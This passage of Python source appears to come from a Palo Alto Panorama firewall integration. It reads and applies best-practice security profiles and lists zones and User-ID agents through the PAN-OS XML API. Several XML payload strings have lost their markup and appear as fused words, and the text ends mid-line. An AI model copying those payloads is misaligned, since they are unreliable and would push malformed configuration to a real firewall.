get_vulnerability_protection_best_practice_command():\n results = get_vulnerability_protection_best_practice()\n vulnerability_protection = results.get('response', {}).get('result', {}).get('vulnerability', {}).get('entry', [])\n strict_profile = next(item for item in vulnerability_protection if item['@name'] == 'strict')\n vulnerability_rules = strict_profile.get('rules', {}).get('entry', [])\n rules = prettify_profiles_rules(vulnerability_rules)\n human_readable = tableToMarkdown('vulnerability Protection Best Practice Profile', rules,\n ['Name', 'Action', 'Host', 'Severity', 'Category', 'Threat-name', 'CVE',\n 'Vendor-id'], removeNull=True)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': strict_profile,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': {\n 'Panorama.Vulnerability.Rule(val.Name == obj.Name)': rules,\n }\n })\n\n\n@logger\ndef get_wildfire_best_practice() -> Dict:\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': '/config/predefined/profiles/wildfire-analysis',\n 'key': API_KEY\n }\n\n result = http_request(URL, 'GET', params=params)\n\n return result\n\n\ndef prettify_wildfire_rule(rule: Dict) -> Dict:\n \"\"\"\n Args:\n rule: The profile security rule to prettify.\n\n Returns: The rule dict compatible with our standard.\n\n \"\"\"\n pretty_rule = {\n 'Name': rule['@name'],\n }\n if 'application' in rule and 'member' in rule['application']:\n pretty_rule['Application'] = rule['application']['member']\n if 'file-type' in rule and 'member' in rule['file-type']:\n pretty_rule['File-type'] = rule['file-type']['member']\n if 'analysis' in rule:\n pretty_rule['Analysis'] = rule['analysis']\n\n return pretty_rule\n\n\ndef prettify_wildfire_rules(rules: Dict) -> List:\n \"\"\"\n Args:\n rules: WildFire rules to prettify.\n\n Returns: List of the rules that are compatible to our standard.\n\n \"\"\"\n if not isinstance(rules, list):\n return [prettify_wildfire_rule(rules)]\n pretty_rules_arr = []\n for rule in rules:\n pretty_rule = prettify_wildfire_rule(rule)\n pretty_rules_arr.append(pretty_rule)\n\n return pretty_rules_arr\n\n\ndef get_wildfire_best_practice_command():\n result = get_wildfire_best_practice()\n wildfire_profile = result.get('response', {}).get('result', {}).get('wildfire-analysis', {})\n best_practice = wildfire_profile.get('entry', {}).get('rules', {}).get('entry', {})\n\n rules = prettify_wildfire_rules(best_practice)\n wildfire_schedule = {\n 'Recurring': 'every-minute',\n 'Action': 'download-and-install'\n }\n ssl_decrypt_settings = {'allow-forward-decrypted-content': 'yes'}\n system_settings = [\n {'Name': 'pe', 'File-size': '10'},\n {'Name': 'apk', 'File-size': '30'},\n {'Name': 'pdf', 'File-size': '1000'},\n {'Name': 'ms-office', 'File-size': '2000'},\n {'Name': 'jar', 'File-size': '5'},\n {'Name': 'flash', 'File-size': '5'},\n {'Name': 'MacOS', 'File-size': '1'},\n {'Name': 'archive', 'File-size': '10'},\n {'Name': 'linux', 'File-size': '2'},\n {'Name': 'script', 'File-size': '20'}\n ]\n\n human_readable = tableToMarkdown('WildFire Best Practice Profile', rules, ['Name', 'Analysis', 'Application',\n 'File-type'], removeNull=True)\n human_readable += tableToMarkdown('Wildfire Best Practice Schedule', wildfire_schedule)\n human_readable += tableToMarkdown('Wildfire SSL Decrypt Settings', ssl_decrypt_settings)\n human_readable += tableToMarkdown('Wildfire System Settings\\n report-grayware-file: yes', system_settings,\n ['Name', 
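prettify_profile_rule / prettify_profiles_rules above special-case non-list input because the PAN-OS XML API returns a single <entry> as a bare dict rather than a one-element list. A self-contained sketch of that normalization pattern, illustrative only:

def ensure_list(value):
    # PAN-OS 'entry' payloads arrive as a dict for one entry, a list for many.
    if value is None:
        return []
    return value if isinstance(value, list) else [value]

assert ensure_list({'@name': 'r1'}) == [{'@name': 'r1'}]
assert ensure_list([{'@name': 'r1'}, {'@name': 'r2'}])[1]['@name'] == 'r2'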
'File-size'])\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': wildfire_profile,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': {\n 'Panorama.WildFire': rules,\n 'Panorama.WildFire.File(val.Name == obj.Name)': system_settings,\n 'Panorama.WildFire.Schedule': wildfire_schedule,\n 'Panorama.WildFire.SSLDecrypt': ssl_decrypt_settings\n }\n })\n\n\ndef set_xpath_wildfire(template: str = None) -> str:\n \"\"\"\n Setting wildfire xpath relevant to panorama instances.\n \"\"\"\n if template:\n xpath_wildfire = f\"/config/devices/entry[@name='localhost.localdomain']/template/entry[@name=\" \\\n f\"'{template}']/config/devices/entry[@name='localhost.localdomain']/deviceconfig/setting/wildfire\"\n\n else:\n xpath_wildfire = \"/config/devices/entry[@name='localhost.localdomain']/deviceconfig/setting\"\n return xpath_wildfire\n\n\n@logger\ndef get_wildfire_system_config(template: str) -> Dict:\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': set_xpath_wildfire(template),\n 'key': API_KEY,\n }\n result = http_request(URL, 'GET', params=params)\n\n return result\n\n\n@logger\ndef get_wildfire_update_schedule(template: str) -> Dict:\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': f\"/config/devices/entry[@name='localhost.localdomain']/template/entry[@name='{template}']\"\n f\"/config/devices/entry[@name='localhost.localdomain']/deviceconfig/system/update-schedule/wildfire\",\n 'key': API_KEY\n }\n result = http_request(URL, 'GET', params=params)\n\n return result\n\n\ndef get_wildfire_configuration_command(template: str):\n file_size = []\n result = get_wildfire_system_config(template)\n system_config = result.get('response', {}).get('result', {}).get('wildfire', {})\n\n file_size_limit = system_config.get('file-size-limit', {}).get('entry', [])\n for item in file_size_limit:\n file_size.append({\n 'Name': item.get('@name'),\n 'Size-limit': item.get('size-limit')\n })\n\n report_grayware_file = system_config.get('report-grayware-file') or 'No'\n human_readable = tableToMarkdown(f'WildFire Configuration\\n Report Grayware File: {report_grayware_file}',\n file_size, ['Name', 'Size-limit'], removeNull=True)\n\n result_schedule = get_wildfire_update_schedule(template)\n\n schedule = result_schedule.get('response', {}).get('result', {}).get('wildfire')\n if '@dirtyId' in schedule:\n demisto.debug(f'Found uncommitted item:\\n{schedule}')\n raise Exception('Please commit the instance prior to getting the WildFire configuration.')\n\n human_readable += tableToMarkdown('The updated schedule for Wildfire', schedule)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': {\n 'Panorama.WildFire(val.Name == obj.Name)': file_size,\n 'Panorama.WildFire.Schedule': schedule\n }\n })\n\n\n@logger\ndef enforce_wildfire_system_config(template: str) -> Dict:\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': f\"/config/devices/entry[@name='localhost.localdomain']/template/entry[@name='{template}']/\"\n f\"config/devices/entry[@name='localhost.localdomain']/deviceconfig/setting\",\n 'key': API_KEY,\n 'element': '<wildfire><file-size-limit><entry name=\"pe\"><size-limit>10</size-limit></entry>'\n '<entry name=\"apk\"><size-limit>30</size-limit></entry>'\n '<entry name=\"pdf\"><size-limit>1000</size-limit></entry><entry name=\"ms-office\"><size-limit>2000</size-limit></entry>'\n '<entry name=\"jar\"><size-limit>5</size-limit></entry>'\n '<entry name=\"flash\"><size-limit>5</size-limit></entry><entry name=\"MacOS\"><size-limit>1</size-limit></entry>'\n '<entry name=\"archive\"><size-limit>10</size-limit></entry>'\n '<entry name=\"linux\"><size-limit>2</size-limit></entry><entry name=\"script\"><size-limit>20</size-limit></entry>'\n '</file-size-limit><report-grayware-file>yes</report-grayware-file></wildfire>'\n }\n result = http_request(URL, 'POST', params=params)\n\n return result\n\n\n@logger\ndef enforce_wildfire_schedule(template: str) -> Dict:\n params = {\n 
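The 'element' payload in enforce_wildfire_system_config mirrors the file-size table and the parser in get_wildfire_configuration_command; assuming that same <file-size-limit> schema, the string can also be assembled from data instead of hand-written. build_wildfire_element is a hypothetical helper:

def build_wildfire_element(limits, report_grayware='yes'):
    # limits: iterable of (file type, size limit) pairs, e.g. [('pe', 10), ('apk', 30)].
    entries = ''.join(
        f'<entry name="{name}"><size-limit>{size}</size-limit></entry>'
        for name, size in limits
    )
    return (f'<wildfire><file-size-limit>{entries}</file-size-limit>'
            f'<report-grayware-file>{report_grayware}</report-grayware-file></wildfire>')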
'action': 'set',\n 'type': 'config',\n 'xpath': f\"/config/devices/entry[@name='localhost.localdomain']/template/entry[@name='{template}']/config/\"\n f\"devices/entry[@name='localhost.localdomain']/deviceconfig/system/update-schedule/wildfire\",\n 'key': API_KEY,\n 'element': 'download-and-install'\n }\n\n result = http_request(URL, 'POST', params=params)\n\n return result\n\n\ndef enforce_wildfire_best_practice_command(template: str):\n enforce_wildfire_system_config(template)\n enforce_wildfire_schedule(template)\n\n return_results('The schedule was updated according to the best practice.'\n '\\nRecurring every minute with the action of \"download and install\"\\n'\n 'The file upload for all file types is set to the maximum size.')\n\n\n@logger\ndef url_filtering_block_default_categories(profile_name: str) -> Dict:\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': f\"{XPATH_RULEBASE}profiles/url-filtering/entry[@name='{profile_name}']/block\",\n 'key': API_KEY,\n 'element': 'adulthackingcommand-and-control'\n 'copyright-infringementextremismmalware'\n 'phishingproxy-avoidance-and-anonymizersparked'\n 'unknowndynamic-dns'\n }\n result = http_request(URL, 'POST', params=params)\n\n return result\n\n\ndef url_filtering_block_default_categories_command(profile_name: str):\n url_filtering_block_default_categories(profile_name)\n return_results(f'The default categories to block has been set successfully to {profile_name}')\n\n\ndef get_url_filtering_best_practice_command():\n best_practice = {\n '@name': 'best-practice', 'credential-enforcement': {\n 'mode': {'disabled': False},\n 'log-severity': 'medium',\n 'alert': {\n 'member': [\n 'abortion', 'abused-drugs', 'adult', 'alcohol-and-tobacco', 'auctions', 'business-and-economy',\n 'computer-and-internet-info', 'content-delivery-networks', 'cryptocurrency', 'dating',\n 'educational-institutions', 'entertainment-and-arts', 'financial-services', 'gambling', 'games',\n 'government', 'grayware', 'health-and-medicine', 'high-risk', 'home-and-garden',\n 'hunting-and-fishing', 'insufficient-content', 'internet-communications-and-telephony',\n 'internet-portals', 'job-search', 'legal', 'low-risk', 'medium-risk', 'military', 'motor-vehicles',\n 'music', 'newly-registered-domain', 'news', 'not-resolved', 'nudity', 'online-storage-and-backup',\n 'peer-to-peer', 'personal-sites-and-blogs', 'philosophy-and-political-advocacy',\n 'private-ip-addresses', 'questionable', 'real-estate', 'recreation-and-hobbies',\n 'reference-and-research', 'religion', 'search-engines', 'sex-education', 'shareware-and-freeware',\n 'shopping', 'social-networking', 'society', 'sports', 'stock-advice-and-tools', 'streaming-media',\n 'swimsuits-and-intimate-apparel', 'training-and-tools', 'translation', 'travel', 'weapons',\n 'web-advertisements', 'web-based-email', 'web-hosting']},\n 'block': {'member': ['command-and-control', 'copyright-infringement', 'dynamic-dns', 'extremism',\n 'hacking', 'malware', 'parked', 'phishing', 'proxy-avoidance-and-anonymizers',\n 'unknown']}},\n 'alert': {'member': ['abortion', 'abused-drugs', 'adult', 'alcohol-and-tobacco', 'auctions',\n 'business-and-economy', 'computer-and-internet-info', 'content-delivery-networks',\n 'cryptocurrency', 'dating', 'educational-institutions', 'entertainment-and-arts',\n 'financial-services', 'gambling', 'games', 'government', 'grayware', 'health-and-medicine',\n 'high-risk', 'home-and-garden', 'hunting-and-fishing', 'insufficient-content',\n 'internet-communications-and-telephony', 'internet-portals', 
'job-search', 'legal',\n 'low-risk', 'medium-risk', 'military', 'motor-vehicles', 'music',\n 'newly-registered-domain', 'news', 'not-resolved', 'nudity', 'online-storage-and-backup',\n 'peer-to-peer', 'personal-sites-and-blogs', 'philosophy-and-political-advocacy',\n 'private-ip-addresses', 'questionable', 'real-estate', 'recreation-and-hobbies',\n 'reference-and-research', 'religion', 'search-engines', 'sex-education',\n 'shareware-and-freeware', 'shopping', 'social-networking', 'society', 'sports',\n 'stock-advice-and-tools', 'streaming-media', 'swimsuits-and-intimate-apparel',\n 'training-and-tools', 'translation', 'travel', 'weapons', 'web-advertisements',\n 'web-based-email', 'web-hosting']},\n 'block': {'member': ['command-and-control', 'copyright-infringement', 'dynamic-dns', 'extremism', 'hacking',\n 'malware', 'parked', 'phishing', 'proxy-avoidance-and-anonymizers', 'unknown']}}\n\n headers_best_practice = {\n 'log-http-hdr-xff': 'yes',\n 'log-http-hdr-user': 'yes',\n 'log-http-hdr-referer': 'yes',\n 'log-container-page-only': 'no'\n }\n rules = prettify_get_url_filter(best_practice)\n human_readable = tableToMarkdown('URL Filtering Best Practice Profile Categories', rules)\n human_readable += tableToMarkdown('Best Practice Headers', headers_best_practice)\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': best_practice,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': {\n 'Panorama.URLFilter': rules,\n 'Panorama.URLFilter.Header': headers_best_practice\n }\n })\n\n\n@logger\ndef create_antivirus_best_practice_profile(profile_name: str) -> Dict:\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': f\"{XPATH_RULEBASE}profiles/virus/entry[@name='{profile_name}']\",\n 'key': API_KEY,\n 'element': 'reset-bothreset-both'\n 'reset-bothreset-both'\n 'reset-bothreset-both'\n ''\n 'reset-bothreset-both'\n 'reset-bothreset-both'\n 'reset-bothreset-both'\n 'reset-bothreset-both'\n ''\n }\n result = http_request(URL, 'POST', params=params)\n\n return result\n\n\ndef create_antivirus_best_practice_profile_command(profile_name: str):\n create_antivirus_best_practice_profile(profile_name)\n return_results(f'The profile {profile_name} was created successfully.')\n\n\n@logger\ndef create_anti_spyware_best_practice_profile(profile_name: str) -> Dict:\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': f\"{XPATH_RULEBASE}profiles/spyware/entry[@name='{profile_name}']\",\n 'key': API_KEY,\n 'element': \"\"\"\n criticalanyany\n disable\n highanyany\n disable\n mediumanyany\n disable\n informationalanyany\n disable\n lowanyany\n disable\"\"\"\n }\n result = http_request(URL, 'POST', params=params)\n\n return result\n\n\ndef create_anti_spyware_best_practice_profile_command(profile_name: str):\n create_anti_spyware_best_practice_profile(profile_name)\n return_results(f'The profile {profile_name} was created successfully.')\n\n\n@logger\ndef create_vulnerability_best_practice_profile(profile_name: str) -> Dict:\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': f\"{XPATH_RULEBASE}profiles/vulnerability/entry[@name='{profile_name}']\",\n 'key': API_KEY,\n 'element': \"\"\"300\n source-and-destinationany\n anyanyany\n anybrute-forcedisable\n any\n criticalanyany\n clientanydisable\n any\n highanyany\n clientanydisable\n any\n mediumanyany\n clientanydisable\n any\n informationalany\n anyclientany\n disable\n any\n lowanyany\n clientanydisable\n any\n criticalanyany\n 
serveranydisable\n any\n highanyany\n serveranydisable\n any\n mediumanyany\n serveranydisable\n any\n informationalanyany\n serveranydisable\n any\n lowanyany\n serveranydisable\"\"\"\n }\n result = http_request(URL, 'POST', params=params)\n\n return result\n\n\ndef create_vulnerability_best_practice_profile_command(profile_name: str):\n create_vulnerability_best_practice_profile(profile_name)\n return_results(f'The profile {profile_name} was created successfully.')\n\n\n@logger\ndef create_url_filtering_best_practice_profile(profile_name: str) -> Dict:\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': f\"{XPATH_RULEBASE}profiles/url-filtering/entry[@name='{profile_name}']\",\n 'key': API_KEY,\n 'element': \"\"\"medium\n abortionabused-drugsalcohol-and-tobacco\n auctionsbusiness-and-economycomputer-and-internet-info\n content-delivery-networkscryptocurrencydating\n educational-institutionsentertainment-and-arts\n financial-servicesgamblinggamesgovernment\n graywarehealth-and-medicinehigh-risk\n home-and-gardenhunting-and-fishinginsufficient-content\n internet-communications-and-telephonyinternet-portals\n job-searchlegallow-riskmedium-risk\n militarymotor-vehiclesmusic\n newly-registered-domainnewsnot-resolved\n nudity\n online-storage-and-backuppeer-to-peerpersonal-sites-and-blogs\n philosophy-and-political-advocacyprivate-ip-addresses\n questionablereal-estaterecreation-and-hobbies\n reference-and-researchreligionsearch-engines\n sex-educationshareware-and-freewareshopping\n social-networkingsocietysports\n stock-advice-and-toolsstreaming-media\n swimsuits-and-intimate-appareltraining-and-tools\n translationtravel\n weaponsweb-advertisementsweb-based-email\n web-hostingadultcommand-and-control\n copyright-infringementdynamic-dnsextremism\n hackingmalwareparkedphishing\n proxy-avoidance-and-anonymizersunknown\n yesyes\n yesno\n abortionabused-drugsalcohol-and-tobacco\n auctionsbusiness-and-economycomputer-and-internet-info\n content-delivery-networkscryptocurrencydating\n educational-institutionsentertainment-and-arts\n financial-servicesgamblinggamesgovernment\n graywarehealth-and-medicinehigh-risk\n home-and-gardenhunting-and-fishinginsufficient-content\n internet-communications-and-telephonyinternet-portals\n job-searchlegallow-risk\n medium-riskmilitary\n motor-vehiclesmusicnewly-registered-domain\n newsnot-resolvednudity\n online-storage-and-backuppeer-to-peerpersonal-sites-and-blogs\n philosophy-and-political-advocacyprivate-ip-addresses\n questionablereal-estaterecreation-and-hobbies\n reference-and-researchreligionsearch-engines\n sex-educationshareware-and-freewareshopping\n social-networkingsocietysports\n stock-advice-and-toolsstreaming-media\n swimsuits-and-intimate-appareltraining-and-tools\n translationtravel\n weaponsweb-advertisementsweb-based-email\n web-hostingadultcommand-and-control\n copyright-infringementdynamic-dnsextremism\n hackingmalwareparkedphishing\n proxy-avoidance-and-anonymizersunknown\"\"\"\n }\n result = http_request(URL, 'POST', params=params)\n\n return result\n\n\ndef create_url_filtering_best_practice_profile_command(profile_name: str):\n create_url_filtering_best_practice_profile(profile_name)\n return_results(f'The profile {profile_name} was created successfully.')\n\n\n@logger\ndef create_file_blocking_best_practice_profile(profile_name: str) -> Dict:\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': f\"{XPATH_RULEBASE}profiles/file-blocking/entry[@name='{profile_name}']\",\n 'key': API_KEY,\n 'element': \"\"\"any\n 
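Several 'element' strings in these profile creators have lost their XML markup in extraction (hence fused values such as 'reset-bothreset-both' and the run-together category names), and the exact tag structure is not recoverable from this file alone. For reference, PAN-OS list values of this kind are sequences of <member> elements, sketched here under that assumed schema:

def to_member_xml(values):
    # Render a PAN-OS list value (e.g. blocked URL categories) as <member> tags.
    return ''.join(f'<member>{v}</member>' for v in values)

print(to_member_xml(['command-and-control', 'malware', 'phishing', 'unknown']))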
7zbatcabchmclass\n cpldllexeflashhlp\n htajarmsiMulti-Level-Encoding\n ocxPEpifrarscr\n tartorrentvbewsf\n bothblock\n anyencrypted-rar\n encrypted-zipbothblock\n any\n anybothalert\"\"\"\n }\n result = http_request(URL, 'POST', params=params)\n\n return result\n\n\ndef create_file_blocking_best_practice_profile_command(profile_name: str):\n create_file_blocking_best_practice_profile(profile_name)\n return_results(f'The profile {profile_name} was created successfully.')\n\n\n@logger\ndef create_wildfire_best_practice_profile(profile_name: str) -> Dict:\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': f\"{XPATH_RULEBASE}profiles/wildfire-analysis/entry[@name='{profile_name}']\",\n 'key': API_KEY,\n 'element': \"\"\"any\n anybothpublic-cloud\"\"\"\n }\n result = http_request(URL, 'POST', params=params)\n\n return result\n\n\ndef create_wildfire_best_practice_profile_command(profile_name: str):\n create_wildfire_best_practice_profile(profile_name)\n return_results(f'The profile {profile_name} was created successfully.')\n\n\ndef prettify_zones_config(zones_config: Union[List, Dict]) -> Union[List, Dict]:\n pretty_zones_config = []\n if isinstance(zones_config, dict):\n return {\n 'Name': zones_config.get('@name'),\n 'Network': zones_config.get('network'),\n 'ZoneProtectionProfile': zones_config.get('zone-protection-profile'),\n 'EnableUserIdentification': zones_config.get('enable-user-identification', 'no'),\n 'LogSetting': zones_config.get('log-setting')\n }\n\n for zone in zones_config:\n pretty_zones_config.append({\n 'Name': zone.get('@name'),\n 'Network': zone.get('network'),\n 'ZoneProtectionProfile': zone.get('zone-protection-profile'),\n 'EnableUserIdentification': zone.get('enable-user-identification', 'no'),\n 'LogSetting': zone.get('log-setting')\n })\n\n return pretty_zones_config\n\n\ndef get_interfaces_from_zone_config(zone_config: Dict) -> List:\n \"\"\"Extract interfaces names from zone configuration\"\"\"\n # a zone has several network options as listed bellow, a single zone my only have one network option\n possible_zone_layers = ['layer2', 'layer3', 'tap', 'virtual-wire', 'tunnel']\n\n for zone_layer in possible_zone_layers:\n zone_network_info = zone_config.get('network', {}).get(zone_layer)\n\n if zone_network_info:\n interfaces = zone_network_info.get('member')\n if interfaces:\n if isinstance(interfaces, str):\n return [interfaces]\n\n else:\n return interfaces\n\n return []\n\n\ndef prettify_user_interface_config(zone_config: Union[List, Dict]) -> Union[List, Dict]:\n pretty_interface_config = []\n if isinstance(zone_config, dict):\n interfaces = get_interfaces_from_zone_config(zone_config)\n\n for interface in interfaces:\n pretty_interface_config.append({\n 'Name': interface,\n 'Zone': zone_config.get('@name'),\n 'EnableUserIdentification': zone_config.get('enable-user-identification', 'no')\n })\n\n else:\n for zone in zone_config:\n interfaces = get_interfaces_from_zone_config(zone)\n\n if isinstance(interfaces, str):\n interfaces = [interfaces]\n\n for interface in interfaces:\n pretty_interface_config.append({\n 'Name': interface,\n 'Zone': zone.get('@name'),\n 'EnableUserIdentification': zone.get('enable-user-identification', 'no')\n })\n\n return pretty_interface_config\n\n\ndef show_user_id_interface_config_request(args):\n template = args.get('template') if args.get('template') else TEMPLATE\n template_stack = args.get('template_stack')\n vsys = args.get('vsys')\n\n if VSYS and not vsys:\n vsys = VSYS\n elif not vsys:\n vsys = 'vsys1'\n\n # 
firewall instance xpath\n if VSYS:\n xpath = \"/config/devices/entry[@name='localhost.localdomain']/vsys/entry[@name=\\'\" + vsys + \"\\']/zone\"\n\n # panorama instance xpath\n elif not template_stack:\n xpath = \"/config/devices/entry[@name='localhost.localdomain']/\" \\\n \"template/entry[@name=\\'\" + template + \"\\']/config/devices/entry[@name='localhost.localdomain']/\" \\\n \"vsys/entry[@name=\\'\" + vsys + \"\\']/zone\"\n else:\n xpath = \"/config/devices/entry[@name='localhost.localdomain']\" \\\n \"/template-stack/entry[@name=\\'\" + template_stack + \\\n \"\\']/config/devices/entry[@name='localhost.localdomain']/vsys/entry[@name=\\'\" + vsys + \"\\']/zone\"\n\n params = {\n 'action': 'show',\n 'type': 'config',\n 'xpath': xpath,\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n return dict_safe_get(result, keys=['response', 'result', 'zone', 'entry'])\n\n\ndef show_user_id_interface_config_command(args: dict):\n raw_response = show_user_id_interface_config_request(args)\n\n if raw_response:\n formatted_results = prettify_user_interface_config(raw_response)\n return_results(\n CommandResults(\n outputs_prefix=\"Panorama.UserInterfaces\",\n outputs_key_field='Name',\n outputs=formatted_results,\n readable_output=tableToMarkdown('User Interface Configuration:', formatted_results,\n ['Name', 'Zone', 'EnableUserIdentification'],\n removeNull=True),\n raw_response=raw_response\n )\n )\n\n else:\n return_results(\"No results found\")\n\n\ndef show_zone_config_command(args):\n raw_response = show_user_id_interface_config_request(args)\n\n if raw_response:\n formatted_results = prettify_zones_config(raw_response)\n return_results(\n CommandResults(\n outputs_prefix=\"Panorama.Zone\",\n outputs_key_field='Name',\n outputs=formatted_results,\n readable_output=tableToMarkdown('Zone Configuration:', formatted_results,\n ['Name', 'Network', 'EnableUserIdentification',\n 'ZoneProtectionProfile', 'LogSetting'],\n removeNull=True),\n raw_response=raw_response\n )\n )\n\n else:\n return_results(\"No results found\")\n\n\ndef list_configured_user_id_agents_request(args, version):\n template = args.get('template') if args.get('template') else TEMPLATE\n template_stack = args.get('template_stack')\n vsys = args.get('vsys')\n\n if VSYS and not vsys:\n vsys = VSYS\n elif not vsys:\n vsys = 'vsys1'\n\n if VSYS:\n if version < 10:\n xpath = \"/config/devices/entry[@name='localhost.localdomain']/\" \\\n \"vsys/entry[@name=\\'\" + vsys + \"\\']/user-id-agent\"\n else:\n xpath = \"/config/devices/entry[@name='localhost.localdomain']\" \\\n \"/vsys/entry[@name=\\'\" + vsys + \"\\']/redistribution-agent\"\n\n elif template_stack:\n if version < 10:\n xpath = \"/config/devices/entry[@name='localhost.localdomain']/template-stack\" \\\n \"/entry[@name=\\'\" + template_stack + \"\\']/config/devices/entry[@name='localhost.localdomain']\" \\\n \"/vsys/entry[@name=\\'\" + vsys + \"\\']/user-id-agent\"\n else:\n xpath = \"/config/devices/entry[@name='localhost.localdomain']/template-stack\" \\\n \"/entry[@name=\\'\" + template_stack + \"\\']/config/devices/entry[@name='localhost.localdomain']\" \\\n \"/vsys/entry[@name=\\'\" + vsys + \"\\']/redistribution-agent\"\n else:\n if version < 10:\n xpath = \"/config/devices/entry[@name='localhost.localdomain']/template/entry[@name=\\'\" + template + \\\n \"\\']/config/devices/entry[@name='localhost.localdomain']/vsys/entry[@name=\\'\" + vsys + \\\n \"\\']/user-id-agent\"\n else:\n xpath = 
\"/config/devices/entry[@name='localhost.localdomain']/template/entry[@name=\\'\" + template + \\\n \"\\']/config/devices/entry[@name='localhost.localdomain']/vsys/entry[@name=\\'\" + vsys + \\\n \"\\']/redistribution-agent\"\n\n params = {\n 'action': 'show',\n 'type': 'config',\n 'xpath': xpath,\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n if version < 10:\n return dict_safe_get(result, keys=['response', 'result', 'user-id-agent', 'entry'])\n\n else:\n return dict_safe_get(result, keys=['response', 'result', 'redistribution-agent', 'entry'])\n\n\ndef prettify_configured_user_id_agents(user_id_agents: Union[List, Dict]) -> Union[List, Dict]:\n pretty_user_id_agents = []\n if isinstance(user_id_agents, dict):\n return {\n 'Name': user_id_agents['@name'],\n 'Host': dict_safe_get(user_id_agents, keys=['host-port', 'host']),\n 'Port': dict_safe_get(user_id_agents, keys=['host-port', 'port']),\n 'NtlmAuth': dict_safe_get(user_id_agents, keys=['host-port', 'ntlm-auth'], default_return_value='no'),\n 'LdapProxy': dict_safe_get(user_id_agents, keys=['host-port', 'ldap-proxy'], default_return_value='no'),\n 'CollectorName': dict_safe_get(user_id_agents, keys=['host-port', 'collectorname']),\n 'Secret': dict_safe_get(user_id_agents, keys=['host-port', 'secret']),\n 'EnableHipCollection': user_id_agents.get('enable-hip-collection', 'no'),\n 'IpUserMapping': user_id_agents.get('ip-user-mappings', 'no'),\n 'SerialNumber': user_id_agents.get('serial-number'),\n 'Disabled': user_id_agents.get('disabled', 'no')\n }\n\n for agent in user_id_agents:\n pretty_user_id_agents.append({\n 'Name': agent['@name'],\n 'Host': dict_safe_get(agent, keys=['host-port', 'host']),\n 'Port': dict_safe_get(agent, keys=['host-port', 'port']),\n 'NtlmAuth': dict_safe_get(agent, keys=['host-port', 'ntlm-auth'], default_return_value='no'),\n 'LdapProxy': dict_safe_get(agent, keys=['host-port', 'ldap-proxy'], default_return_value='no'),\n 'CollectorName': dict_safe_get(agent, keys=['host-port', 'collectorname']),\n 'Secret': dict_safe_get(agent, keys=['host-port', 'secret']),\n 'EnableHipCollection': agent.get('enable-hip-collection', 'no'),\n 'IpUserMapping': agent.get('ip-user-mappings', 'no'),\n 'SerialNumber': agent.get('serial-number'),\n 'Disabled': agent.get('disabled', 'no')\n })\n\n return pretty_user_id_agents\n\n\ndef list_configured_user_id_agents_command(args):\n version = get_pan_os_major_version()\n raw_response = list_configured_user_id_agents_request(args, version)\n if raw_response:\n formatted_results = prettify_configured_user_id_agents(raw_response)\n headers = ['Name', 'Disabled', 'SerialNumber', 'Host', 'Port', 'CollectorName', 'LdapProxy', 'NtlmAuth',\n 'IpUserMapping']\n\n return_results(\n CommandResults(\n outputs_prefix='Panorama.UserIDAgents',\n outputs_key_field='Name',\n outputs=formatted_results,\n readable_output=tableToMarkdown('User ID Agents:', formatted_results,\n headers, removeNull=True),\n raw_response=raw_response\n )\n )\n else:\n return_results(\"No results found\")\n\n\ndef initialize_instance(args: Dict[str, str], params: Dict[str, str]):\n global URL, API_KEY, USE_SSL, USE_URL_FILTERING, VSYS, DEVICE_GROUP, XPATH_SECURITY_RULES, XPATH_OBJECTS, \\\n XPATH_RULEBASE, TEMPLATE, PRE_POST\n if not params.get('port'):\n raise DemistoException('Set a port for the instance')\n\n URL = params.get('server', '').rstrip('/:') + ':' + params.get('port', '') + '/api/'\n API_KEY = str(params.get('key'))\n USE_SSL = not params.get('insecure')\n 
USE_URL_FILTERING = params.get('use_url_filtering')\n TEMPLATE = params.get('template')\n\n # determine a vsys or a device-group\n VSYS = params.get('vsys', '')\n\n if args and args.get('device-group'):\n DEVICE_GROUP = args.get('device-group') # type: ignore[assignment]\n else:\n DEVICE_GROUP = params.get('device_group', None) # type: ignore[arg-type]\n\n PRE_POST = args.get('pre_post', '')\n\n # configuration check\n if DEVICE_GROUP and VSYS:\n raise DemistoException(\n 'Cannot configure both vsys and Device group. Set vsys for firewall, set Device group for Panorama.')\n if not DEVICE_GROUP and not VSYS:\n raise DemistoException('Set vsys for firewall or Device group for Panorama.')\n\n # setting security xpath relevant to FW or panorama management\n if DEVICE_GROUP:\n device_group_shared = DEVICE_GROUP.lower()\n if device_group_shared == 'shared':\n XPATH_SECURITY_RULES = \"/config/shared/\"\n DEVICE_GROUP = device_group_shared\n else:\n XPATH_SECURITY_RULES = \"/config/devices/entry/device-group/entry[@name=\\'\" + DEVICE_GROUP + \"\\']/\"\n else:\n XPATH_SECURITY_RULES = \"/config/devices/entry/vsys/entry[@name=\\'\" + VSYS + \"\\']/rulebase/security/rules/entry\"\n\n # setting objects xpath relevant to FW or panorama management\n if DEVICE_GROUP:\n device_group_shared = DEVICE_GROUP.lower()\n if DEVICE_GROUP == 'shared':\n XPATH_OBJECTS = \"/config/shared/\"\n DEVICE_GROUP = 